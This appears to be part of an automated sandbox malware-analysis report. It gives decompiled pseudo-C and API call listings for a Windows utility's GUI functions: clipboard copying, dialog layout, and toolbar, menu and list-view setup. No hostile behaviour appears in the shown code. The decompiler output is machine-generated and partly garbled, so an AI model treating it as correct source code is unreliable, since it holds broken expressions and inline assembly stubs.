                                                                                                                                                      0x0040ae98

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040637A: wcslen.MSVCRT ref: 0040638D
                                                                                                                                                        • Part of subcall function 0040637A: memcpy.MSVCRT ref: 004063AC
                                                                                                                                                        • Part of subcall function 0040AE99: SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0040AEEB
                                                                                                                                                      • OpenClipboard.USER32(?), ref: 0040AE86
                                                                                                                                                        • Part of subcall function 004054F1: EmptyClipboard.USER32(?,?,0040AE96,00000000), ref: 004054F9
                                                                                                                                                        • Part of subcall function 004054F1: wcslen.MSVCRT ref: 00405506
                                                                                                                                                        • Part of subcall function 004054F1: GlobalAlloc.KERNEL32(00002000,00000002,00000000,?,?,?,0040AE96,00000000), ref: 00405516
                                                                                                                                                        • Part of subcall function 004054F1: GlobalLock.KERNEL32 ref: 00405523
                                                                                                                                                        • Part of subcall function 004054F1: memcpy.MSVCRT ref: 0040552C
                                                                                                                                                        • Part of subcall function 004054F1: GlobalUnlock.KERNEL32(00000000), ref: 00405535
                                                                                                                                                        • Part of subcall function 004054F1: SetClipboardData.USER32 ref: 0040553E
                                                                                                                                                        • Part of subcall function 004054F1: CloseClipboard.USER32 ref: 0040554E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Clipboard$Global$memcpywcslen$AllocCloseDataEmptyLockMessageOpenSendUnlock
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2178300729-0
                                                                                                                                                      • Opcode ID: 2bf5dca165b34132fb64bb1855b861156878277b56bd8399cb3bfe959ead56f4
                                                                                                                                                      • Instruction ID: d2c7d0a254bb278864896b88801620e30a707c529b051fe324ebedfb26bf80ea
                                                                                                                                                      • Opcode Fuzzy Hash: 2bf5dca165b34132fb64bb1855b861156878277b56bd8399cb3bfe959ead56f4
                                                                                                                                                      • Instruction Fuzzy Hash: F0E0DFB1100B0056C6217736A801B9B76A26F80324B100B3EF8A6B11E2CB3960AA9A49
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040D12C, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 98%
                                                                                                                                                      			E0040D12C(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, intOrPtr _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, signed int _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, short _a72, intOrPtr _a76, struct tagRECT _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a584) {
				signed int _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v52;
				struct HWND__* _v56;
				struct HWND__* _v60;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				struct HDC__* _t169;
				struct HWND__* _t171;
				intOrPtr _t220;
				void* _t221;
				intOrPtr _t232;
				struct HWND__* _t234;
				void* _t237;
				intOrPtr* _t271;
				signed int _t272;
				signed int _t273;

				_t271 = __esi;
				_t273 = _t272 & 0xfffffff8;
				E0040E340(0x4298, __ecx);
				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x44)) + 0x2e4));
				_t234 = GetDlgItem( *(__esi + 0x10), 0x3e9);
				_a4 = GetDlgItem( *(__esi + 0x10), 0x3e8);
				_a20 = GetWindowLongW(_t234, 0xfffffff0);
				_a24 = GetWindowLongW(_a4, 0xfffffff0);
				_a96 = GetWindowLongW(_t234, 0xffffffec);
				_a36 = GetWindowLongW(_a4, 0xffffffec);
				GetWindowRect(_t234,  &_a100);
				GetWindowRect(_a4,  &_a60);
				MapWindowPoints(0,  *(__esi + 0x10),  &_a100, 2);
				MapWindowPoints(0,  *(__esi + 0x10),  &_a60, 2);
				_t237 = _a108 - _a100.x;
				_a4 = _a4 & 0x00000000;
				_a28 = _a68 - _a60.x;
				_a76 = _a112 - _a104;
				_a40 = _a72 - _a64;
				_t169 = GetDC( *(__esi + 0x10));
				_a16 = _t169;
				if(_t169 == 0) {
					L9:
					_v0 = _v0 & 0x00000000;
					if( *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)) <= 0) {
						L12:
						_t171 = GetDlgItem( *(_t271 + 0x10), 1);
						_a36 = _t171;
						GetWindowRect(_t171,  &_a44);
						MapWindowPoints(0,  *(_t271 + 0x10),  &_a44, 2);
						GetClientRect( *(_t271 + 0x10),  &_a124);
						GetWindowRect( *(_t271 + 0x10),  &_a80);
						SetWindowPos( *(_t271 + 0x10), 0, 0, 0, _a88 - _a80.left + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
						GetClientRect( *(_t271 + 0x10),  &_a80);
						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
					}
					_a20 = _a20 | 0x10000000;
					_a24 = _a24 | 0x10000000;
					_a8 = _a12 + 0x10;
					do {
						 *((intOrPtr*)( *_t271 + 0x20))(_v0);
						_v24 = E00401551(_t271, _a92, L"STATIC", _a16, _a96, _v0 + _a100.x, _t237, _a72);
						_v52 = E00401551(_t271, _v0, L"EDIT", _v12, _a24, _v32 + _a28, _v8,  *(_t271 + 0x48) * _a4);
						L0040DFD6();
						_t273 = _t273 + 0x10;
						SetWindowTextW(_v56,  &_a72);
						SetWindowTextW(_v60,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x40))))))(_v68,  &_a584,  &_a72, 0xff, L"%s:", _v60->i));
						_v68 = _v68 + 0x14;
						_v72 = _v72 +  *(_t271 + 0x48) * _v36 +  *((intOrPtr*)(_t271 + 0x4c));
						_v76 = _v76 + 1;
					} while (_v76 <  *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)));
					goto L12;
				}
				_t220 = 0;
				_a32 = _a32 & 0;
				_a8 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x44)) + 0x2e0)) <= 0) {
					L8:
					_t221 = _t220 - _t237;
					_a28 = _a28 - _t221;
					_a60.x = _a60.x + _t221;
					_t237 = _t237 + _t221;
					ReleaseDC( *(_t271 + 0x10), _a16);
					goto L9;
				}
				_v0 = _a12 + 0x10;
				do {
					if(GetTextExtentPoint32W(_a16,  *_v0, wcslen( *_v0),  &_a116) != 0) {
						_t232 = _a100.x + 0xa;
						if(_t232 > _v8) {
							_v8 = _t232;
						}
					}
					_a16 =  &(_a16->i);
					_v16 = _v16 + 0x14;
				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)));
				_t220 = _v8;
				goto L8;
			}


























                                                                                                                                                      0x0040d12c
                                                                                                                                                      0x0040d12f
                                                                                                                                                      0x0040d137
                                                                                                                                                      0x0040d155
                                                                                                                                                      0x0040d163
                                                                                                                                                      0x0040d170
                                                                                                                                                      0x0040d17c
                                                                                                                                                      0x0040d185
                                                                                                                                                      0x0040d191
                                                                                                                                                      0x0040d19d
                                                                                                                                                      0x0040d1a7
                                                                                                                                                      0x0040d1b2
                                                                                                                                                      0x0040d1c6
                                                                                                                                                      0x0040d1d4
                                                                                                                                                      0x0040d1e5
                                                                                                                                                      0x0040d1e9
                                                                                                                                                      0x0040d1ee
                                                                                                                                                      0x0040d1fd
                                                                                                                                                      0x0040d209
                                                                                                                                                      0x0040d20d
                                                                                                                                                      0x0040d215
                                                                                                                                                      0x0040d219
                                                                                                                                                      0x0040d2b1
                                                                                                                                                      0x0040d2b4
                                                                                                                                                      0x0040d2c0
                                                                                                                                                      0x0040d3d1
                                                                                                                                                      0x0040d3d6
                                                                                                                                                      0x0040d3e2
                                                                                                                                                      0x0040d3e6
                                                                                                                                                      0x0040d3f4
                                                                                                                                                      0x0040d40b
                                                                                                                                                      0x0040d415
                                                                                                                                                      0x0040d45b
                                                                                                                                                      0x0040d465
                                                                                                                                                      0x0040d4a4
                                                                                                                                                      0x0040d4a4
                                                                                                                                                      0x0040d2d1
                                                                                                                                                      0x0040d2e2
                                                                                                                                                      0x0040d2e6
                                                                                                                                                      0x0040d2ea
                                                                                                                                                      0x0040d2f2
                                                                                                                                                      0x0040d323
                                                                                                                                                      0x0040d352
                                                                                                                                                      0x0040d36e
                                                                                                                                                      0x0040d373
                                                                                                                                                      0x0040d382
                                                                                                                                                      0x0040d3a0
                                                                                                                                                      0x0040d3b1
                                                                                                                                                      0x0040d3b6
                                                                                                                                                      0x0040d3ba
                                                                                                                                                      0x0040d3c5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d2ea
                                                                                                                                                      0x0040d222
                                                                                                                                                      0x0040d224
                                                                                                                                                      0x0040d22e
                                                                                                                                                      0x0040d232
                                                                                                                                                      0x0040d298
                                                                                                                                                      0x0040d29c
                                                                                                                                                      0x0040d2a1
                                                                                                                                                      0x0040d2a5
                                                                                                                                                      0x0040d2a9
                                                                                                                                                      0x0040d2ab
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d2ab
                                                                                                                                                      0x0040d23b
                                                                                                                                                      0x0040d23f
                                                                                                                                                      0x0040d266
                                                                                                                                                      0x0040d26f
                                                                                                                                                      0x0040d276
                                                                                                                                                      0x0040d278
                                                                                                                                                      0x0040d278
                                                                                                                                                      0x0040d276
                                                                                                                                                      0x0040d27c
                                                                                                                                                      0x0040d287
                                                                                                                                                      0x0040d28c
                                                                                                                                                      0x0040d294
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32 ref: 0040D159
                                                                                                                                                      • GetDlgItem.USER32 ref: 0040D165
                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0040D174
                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0040D180
                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0040D189
                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0040D195
                                                                                                                                                      • GetWindowRect.USER32 ref: 0040D1A7
                                                                                                                                                      • GetWindowRect.USER32 ref: 0040D1B2
                                                                                                                                                      • MapWindowPoints.USER32 ref: 0040D1C6
                                                                                                                                                      • MapWindowPoints.USER32 ref: 0040D1D4
                                                                                                                                                      • GetDC.USER32 ref: 0040D20D
                                                                                                                                                      • wcslen.MSVCRT ref: 0040D24D
                                                                                                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0040D25E
                                                                                                                                                      • ReleaseDC.USER32 ref: 0040D2AB
                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040D36E
                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 0040D382
                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 0040D3A0
                                                                                                                                                      • GetDlgItem.USER32 ref: 0040D3D6
                                                                                                                                                      • GetWindowRect.USER32 ref: 0040D3E6
                                                                                                                                                      • MapWindowPoints.USER32 ref: 0040D3F4
                                                                                                                                                      • GetClientRect.USER32 ref: 0040D40B
                                                                                                                                                      • GetWindowRect.USER32 ref: 0040D415
                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0040D45B
                                                                                                                                                      • GetClientRect.USER32 ref: 0040D465
                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040D49D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                                                                      • API String ID: 2080319088-3046471546
                                                                                                                                                      • Opcode ID: c102a7a5600ef86d24e901ec56d59f6fa3db94701319a0c7660b80572fc7c6b1
                                                                                                                                                      • Instruction ID: af222cd68e1cf1c2961fcc0c9276d13d323a9bd1d9fa968012e99cc026c1ed94
                                                                                                                                                      • Opcode Fuzzy Hash: c102a7a5600ef86d24e901ec56d59f6fa3db94701319a0c7660b80572fc7c6b1
                                                                                                                                                      • Instruction Fuzzy Hash: D4B1C171508301AFD720DFA8C985E6BBBF9FF88714F00492DF695962A1D775E8088F16
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040A742, Relevance: 47.6, APIs: 22, Strings: 5, Instructions: 303windowregistryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                      			E0040A742(void* __ecx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __esi;
				struct HMENU__* _t123;
				struct HWND__* _t125;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t139;
				void* _t187;
				long _t193;
				void* _t198;
				void* _t200;
				void* _t216;
				long _t218;
				intOrPtr _t220;
				intOrPtr _t221;
				void* _t222;
				int _t225;
				void* _t226;
				intOrPtr* _t228;
				intOrPtr* _t229;
				void* _t231;
				void* _t232;
				intOrPtr* _t233;
				long _t241;

				_t229 = _t231 - 0x78;
				_t232 = _t231 - 0xa4;
				 *((char*)(_t229 - 0x23)) = 1;
				_t187 = __ecx;
				 *(_t229 - 0x2c) = 0;
				 *((intOrPtr*)(_t229 - 0x28)) = 0;
				 *((char*)(_t229 - 0x24)) = 0;
				 *((char*)(_t229 - 0x22)) = 0;
				 *((char*)(_t229 - 0x21)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t229 - 0x18) = 1;
				 *((intOrPtr*)(_t229 - 0x14)) = 0x9c41;
				 *((char*)(_t229 - 0x10)) = 4;
				 *((char*)(_t229 - 0xf)) = 0;
				 *((char*)(_t229 - 0xe)) = 0;
				 *((char*)(_t229 - 0xd)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t229 - 4)) = 5;
				 *_t229 = 0x9c44;
				 *((char*)(_t229 + 4)) = 4;
				 *((char*)(_t229 + 5)) = 0;
				 *((char*)(_t229 + 6)) = 0;
				 *((char*)(_t229 + 7)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t229 + 0x10) = 2;
				 *((intOrPtr*)(_t229 + 0x14)) = 0x9c48;
				 *((char*)(_t229 + 0x18)) = 4;
				 *((char*)(_t229 + 0x19)) = 0;
				 *((char*)(_t229 + 0x1a)) = 0;
				 *((char*)(_t229 + 0x1b)) = 0;
				 *(_t229 + 0x68) =  *(_t229 + 0x68) | 0xffffffff;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t229 + 0x24)) = 3;
				 *((intOrPtr*)(_t229 + 0x28)) = 0x9c49;
				 *((char*)(_t229 + 0x2c)) = 4;
				 *((char*)(_t229 + 0x2d)) = 0;
				 *((char*)(_t229 + 0x2e)) = 0;
				 *((char*)(_t229 + 0x2f)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t229 + 0x38)) = 0;
				 *((intOrPtr*)(_t229 + 0x3c)) = 0x9c4e;
				 *((char*)(_t229 + 0x40)) = 4;
				 *((char*)(_t229 + 0x41)) = 0;
				 *((char*)(_t229 + 0x42)) = 0;
				 *((char*)(_t229 + 0x43)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t229 + 0x4c)) = 4;
				 *((intOrPtr*)(_t229 + 0x50)) = 0x9c42;
				 *((char*)(_t229 + 0x54)) = 4;
				 *((char*)(_t229 + 0x55)) = 0;
				 *((char*)(_t229 + 0x56)) = 0;
				 *((char*)(_t229 + 0x57)) = 0;
				asm("stosd");
				_t216 = 0x66;
				asm("stosd");
				_t123 = E00406AFA(_t216);
				 *(__ecx + 0x21c) = _t123;
				SetMenu( *(__ecx + 0x208), _t123);
				_t125 = CreateStatusWindowW(0x50000000, 0x40f454,  *(_t187 + 0x208), 0x101);
				 *(_t187 + 0x214) = _t125;
				SendMessageW(_t125, 0x404, 1, _t229 + 0x68);
				 *(_t187 + 0x218) = CreateToolbarEx( *(_t187 + 0x208), 0x50010900, 0x102, 6, 0, E00405F82(), _t229 - 0x2c, 7, 0x10, 0x10, 0x60, 0x10, 0x14);
				 *(_t229 + 0x74) = ImageList_Create(0x10, 0x10, 0x18, 0, 1);
				_t131 = E00402DE1(__fp0);
				 *(_t229 + 0x70) = _t131;
				ImageList_Add( *(_t229 + 0x74), _t131, 0);
				DeleteObject( *(_t229 + 0x70));
				SendMessageW( *(_t187 + 0x218), 0x436, 0,  *(_t229 + 0x74));
				_t135 =  *((intOrPtr*)(_t187 + 0x69c));
				_t236 =  *((intOrPtr*)(_t135 + 0x2f4));
				_t218 = 0x50810809;
				if( *((intOrPtr*)(_t135 + 0x2f4)) != 0) {
					_t218 = 0x50811809;
				}
				E00401EA3( *((intOrPtr*)(_t187 + 0x69c)), _t236, CreateWindowExW(0, L"SysListView32", 0, _t218, 0, 0, 0x190, 0xc8,  *(_t187 + 0x208), 0x103, GetModuleHandleW(0), 0), 1);
				_t139 =  *((intOrPtr*)(_t187 + 0x69c));
				_t193 =  *(_t139 + 0x2e0);
				_t220 =  *((intOrPtr*)(_t139 + 0x2e4));
				 *(_t229 + 0x70) =  *(_t139 + 0x2ac);
				if(_t193 <= 0) {
					L5:
					 *( *((intOrPtr*)(_t187 + 0x69c)) + 0x340) =  *(_t187 + 0x214);
					_t221 =  *((intOrPtr*)(_t187 + 0x69c));
					E004099C4(_t221);
					ImageList_ReplaceIcon( *(_t221 + 0x2b4), 0, LoadIconW(GetModuleHandleW(0), 0x66));
					_t222 = 0x68;
					 *((intOrPtr*)(_t187 + 0x278)) = E00406AFA(_t222);
					 *(_t187 + 0x27c) = 0 | E004065C4( *((intOrPtr*)(_t187 + 0x6c0)), L"/nosaveload") >= 0x00000000;
					E0040B147(_t187, E004065C4( *((intOrPtr*)(_t187 + 0x6c0)), L"/nosaveload") >= 0, 0);
					memcpy(_t187 + 0x744,  &(( *(_t187 + 0x698))[0x8a]), 0x200c);
					_t233 = _t232 + 0xc;
					E00401500(_t187 + 0x6c4, 0x72,  *(_t187 + 0x208));
					asm("sbb eax, eax");
					ShowWindow( *(_t187 + 0x6d4),  ~(( *(_t187 + 0x698))[0x89]) & 0x00000005);
					 *( *(_t187 + 0x698)) = 1;
					E004077CB( *((intOrPtr*)(_t187 + 0x69c)));
					_t241 =  *0x4134e0; // 0x0
					if(_t241 == 0) {
						E00405812(0x4134e0);
						if((GetFileAttributesW(0x4134e0) & 0x00000001) != 0) {
							GetTempPathW(0x104, 0x4134e0);
						}
					}
					_t225 = wcslen(0x4134e0);
					 *_t233 = L"report.html";
					_t105 = wcslen(??) + 1; // 0x1
					_t243 = _t225 + _t105 - 0x104;
					if(_t225 + _t105 >= 0x104) {
						 *((short*)(_t187 + 0x288)) = 0;
					} else {
						E00405930(_t187 + 0x288, 0x4134e0, L"report.html");
					}
					_t198 = 0x30;
					E00409BA7( *((intOrPtr*)(_t187 + 0x69c)), _t198);
					_t226 = _t187;
					E0040A6FF(_t226);
					E00405D0F( *(_t187 + 0x214), 0x2000000);
					_t200 = 1;
					 *((intOrPtr*)(_t187 + 0x6a0)) = RegisterWindowMessageW(L"commdlg_FindReplace");
					E0040A1DC(0, _t200, _t226, _t243);
					 *(_t229 + 0x60) = 0x12c;
					 *((intOrPtr*)(_t229 + 0x64)) = 0x400;
					SendMessageW( *(_t226 + 0x214), 0x404, 2, _t229 + 0x60);
					SendMessageW( *(_t226 + 0x214), 0x40b, 0x1001, 0);
					return E00401BDC(_t226, 0x415);
				} else {
					_t228 = _t220 + 0xc;
					 *(_t229 + 0x74) = _t193;
					do {
						E00402842( *((intOrPtr*)(_t228 + 4)),  *((intOrPtr*)(_t228 - 8)),  *(_t229 + 0x70),  *((intOrPtr*)(_t228 - 0xc)),  *((intOrPtr*)(_t228 - 4)),  *_t228);
						_t232 = _t232 + 0x10;
						_t228 = _t228 + 0x14;
						_t81 = _t229 + 0x74;
						 *_t81 =  *(_t229 + 0x74) - 1;
					} while ( *_t81 != 0);
					goto L5;
				}
			}



























                                                                                                                                                      0x0040a743
                                                                                                                                                      0x0040a747
                                                                                                                                                      0x0040a74d
                                                                                                                                                      0x0040a756
                                                                                                                                                      0x0040a75a
                                                                                                                                                      0x0040a75d
                                                                                                                                                      0x0040a760
                                                                                                                                                      0x0040a763
                                                                                                                                                      0x0040a766
                                                                                                                                                      0x0040a76c
                                                                                                                                                      0x0040a76d
                                                                                                                                                      0x0040a76e
                                                                                                                                                      0x0040a775
                                                                                                                                                      0x0040a77c
                                                                                                                                                      0x0040a780
                                                                                                                                                      0x0040a783
                                                                                                                                                      0x0040a786
                                                                                                                                                      0x0040a78e
                                                                                                                                                      0x0040a78f
                                                                                                                                                      0x0040a790
                                                                                                                                                      0x0040a797
                                                                                                                                                      0x0040a79e
                                                                                                                                                      0x0040a7a2
                                                                                                                                                      0x0040a7a5
                                                                                                                                                      0x0040a7a8
                                                                                                                                                      0x0040a7b0
                                                                                                                                                      0x0040a7b1
                                                                                                                                                      0x0040a7b2
                                                                                                                                                      0x0040a7b9
                                                                                                                                                      0x0040a7c0
                                                                                                                                                      0x0040a7c4
                                                                                                                                                      0x0040a7c7
                                                                                                                                                      0x0040a7ca
                                                                                                                                                      0x0040a7cf
                                                                                                                                                      0x0040a7d6
                                                                                                                                                      0x0040a7d7
                                                                                                                                                      0x0040a7d8
                                                                                                                                                      0x0040a7df
                                                                                                                                                      0x0040a7e6
                                                                                                                                                      0x0040a7ea
                                                                                                                                                      0x0040a7ed
                                                                                                                                                      0x0040a7f0
                                                                                                                                                      0x0040a7f8
                                                                                                                                                      0x0040a7f9
                                                                                                                                                      0x0040a7fa
                                                                                                                                                      0x0040a7fd
                                                                                                                                                      0x0040a804
                                                                                                                                                      0x0040a808
                                                                                                                                                      0x0040a80b
                                                                                                                                                      0x0040a80e
                                                                                                                                                      0x0040a816
                                                                                                                                                      0x0040a817
                                                                                                                                                      0x0040a818
                                                                                                                                                      0x0040a81f
                                                                                                                                                      0x0040a826
                                                                                                                                                      0x0040a82a
                                                                                                                                                      0x0040a82d
                                                                                                                                                      0x0040a830
                                                                                                                                                      0x0040a838
                                                                                                                                                      0x0040a83b
                                                                                                                                                      0x0040a83c
                                                                                                                                                      0x0040a83d
                                                                                                                                                      0x0040a842
                                                                                                                                                      0x0040a84f
                                                                                                                                                      0x0040a86a
                                                                                                                                                      0x0040a882
                                                                                                                                                      0x0040a888
                                                                                                                                                      0x0040a8c4
                                                                                                                                                      0x0040a8d0
                                                                                                                                                      0x0040a8d3
                                                                                                                                                      0x0040a8dd
                                                                                                                                                      0x0040a8e0
                                                                                                                                                      0x0040a8e9
                                                                                                                                                      0x0040a8fe
                                                                                                                                                      0x0040a900
                                                                                                                                                      0x0040a906
                                                                                                                                                      0x0040a90c
                                                                                                                                                      0x0040a911
                                                                                                                                                      0x0040a913
                                                                                                                                                      0x0040a913
                                                                                                                                                      0x0040a94f
                                                                                                                                                      0x0040a954
                                                                                                                                                      0x0040a95a
                                                                                                                                                      0x0040a962
                                                                                                                                                      0x0040a96e
                                                                                                                                                      0x0040a971
                                                                                                                                                      0x0040a99a
                                                                                                                                                      0x0040a9a6
                                                                                                                                                      0x0040a9ac
                                                                                                                                                      0x0040a9b4
                                                                                                                                                      0x0040a9d1
                                                                                                                                                      0x0040a9d9
                                                                                                                                                      0x0040a9ea
                                                                                                                                                      0x0040a9ff
                                                                                                                                                      0x0040aa05
                                                                                                                                                      0x0040aa22
                                                                                                                                                      0x0040aa27
                                                                                                                                                      0x0040aa39
                                                                                                                                                      0x0040aa4c
                                                                                                                                                      0x0040aa58
                                                                                                                                                      0x0040aa64
                                                                                                                                                      0x0040aa70
                                                                                                                                                      0x0040aa75
                                                                                                                                                      0x0040aa81
                                                                                                                                                      0x0040aa83
                                                                                                                                                      0x0040aa91
                                                                                                                                                      0x0040aa99
                                                                                                                                                      0x0040aa99
                                                                                                                                                      0x0040aa91
                                                                                                                                                      0x0040aaa5
                                                                                                                                                      0x0040aaa7
                                                                                                                                                      0x0040aab3
                                                                                                                                                      0x0040aab7
                                                                                                                                                      0x0040aabd
                                                                                                                                                      0x0040aad8
                                                                                                                                                      0x0040aabf
                                                                                                                                                      0x0040aacf
                                                                                                                                                      0x0040aad5
                                                                                                                                                      0x0040aae9
                                                                                                                                                      0x0040aaea
                                                                                                                                                      0x0040aaef
                                                                                                                                                      0x0040aaf1
                                                                                                                                                      0x0040ab01
                                                                                                                                                      0x0040ab07
                                                                                                                                                      0x0040ab13
                                                                                                                                                      0x0040ab1b
                                                                                                                                                      0x0040ab37
                                                                                                                                                      0x0040ab3e
                                                                                                                                                      0x0040ab45
                                                                                                                                                      0x0040ab58
                                                                                                                                                      0x0040ab6d
                                                                                                                                                      0x0040a973
                                                                                                                                                      0x0040a973
                                                                                                                                                      0x0040a976
                                                                                                                                                      0x0040a979
                                                                                                                                                      0x0040a98a
                                                                                                                                                      0x0040a98f
                                                                                                                                                      0x0040a992
                                                                                                                                                      0x0040a995
                                                                                                                                                      0x0040a995
                                                                                                                                                      0x0040a995
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040a979

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406AFA: LoadMenuW.USER32 ref: 00406B02
                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 0040A84F
                                                                                                                                                      • CreateStatusWindowW.COMCTL32(50000000,0040F454,?,00000101), ref: 0040A86A
                                                                                                                                                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 0040A888
                                                                                                                                                        • Part of subcall function 00405F82: GetModuleHandleW.KERNEL32(00000000), ref: 00405F8E
                                                                                                                                                        • Part of subcall function 00405F82: LoadImageW.USER32 ref: 00405F9F
                                                                                                                                                        • Part of subcall function 00405F82: GetObjectW.GDI32(?,00000018,?), ref: 00405FBE
                                                                                                                                                        • Part of subcall function 00405F82: CreateCompatibleDC.GDI32(00000000), ref: 00405FC5
                                                                                                                                                        • Part of subcall function 00405F82: SelectObject.GDI32(00000000,?), ref: 00405FD1
                                                                                                                                                        • Part of subcall function 00405F82: GetSysColor.USER32(0000000F), ref: 00405FDC
                                                                                                                                                        • Part of subcall function 00405F82: GetPixel.GDI32(00000000,00000000,00000000), ref: 00405FEE
                                                                                                                                                        • Part of subcall function 00405F82: GetPixel.GDI32(00000000,?,?), ref: 0040600A
                                                                                                                                                        • Part of subcall function 00405F82: SetPixel.GDI32(00000000,?,?,?), ref: 0040601B
                                                                                                                                                        • Part of subcall function 00405F82: SelectObject.GDI32(00000000,?), ref: 0040603B
                                                                                                                                                        • Part of subcall function 00405F82: DeleteDC.GDI32(00000000), ref: 00406042
                                                                                                                                                      • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000006,00000000,00000000,?,00000007,00000010,00000010,00000060,00000010,00000014), ref: 0040A8B5
                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000018,00000000,00000001), ref: 0040A8CA
                                                                                                                                                        • Part of subcall function 00402DE1: GetModuleHandleW.KERNEL32(00000000,0000006E,00000000,00000000,00000000,00001060), ref: 00402DFA
                                                                                                                                                        • Part of subcall function 00402DE1: LoadImageW.USER32 ref: 00402E01
                                                                                                                                                        • Part of subcall function 00402DE1: GetObjectW.GDI32(?,00000018,?), ref: 00402E25
                                                                                                                                                        • Part of subcall function 00402DE1: CreateCompatibleDC.GDI32(00000000), ref: 00402E2C
                                                                                                                                                        • Part of subcall function 00402DE1: SelectObject.GDI32(00000000,?), ref: 00402E39
                                                                                                                                                        • Part of subcall function 00402DE1: GetSysColor.USER32(0000000F), ref: 00402E45
                                                                                                                                                        • Part of subcall function 00402DE1: GetPixel.GDI32(00000000,00000000,00000000), ref: 00402E58
                                                                                                                                                        • Part of subcall function 00402DE1: GetPixel.GDI32(00000000,?,?), ref: 00402E83
                                                                                                                                                        • Part of subcall function 00402DE1: SetPixel.GDI32(00000000,?,?,?), ref: 00402F00
                                                                                                                                                        • Part of subcall function 00402DE1: SelectObject.GDI32(00000000,?), ref: 00402F2F
                                                                                                                                                        • Part of subcall function 00402DE1: DeleteDC.GDI32(00000000), ref: 00402F36
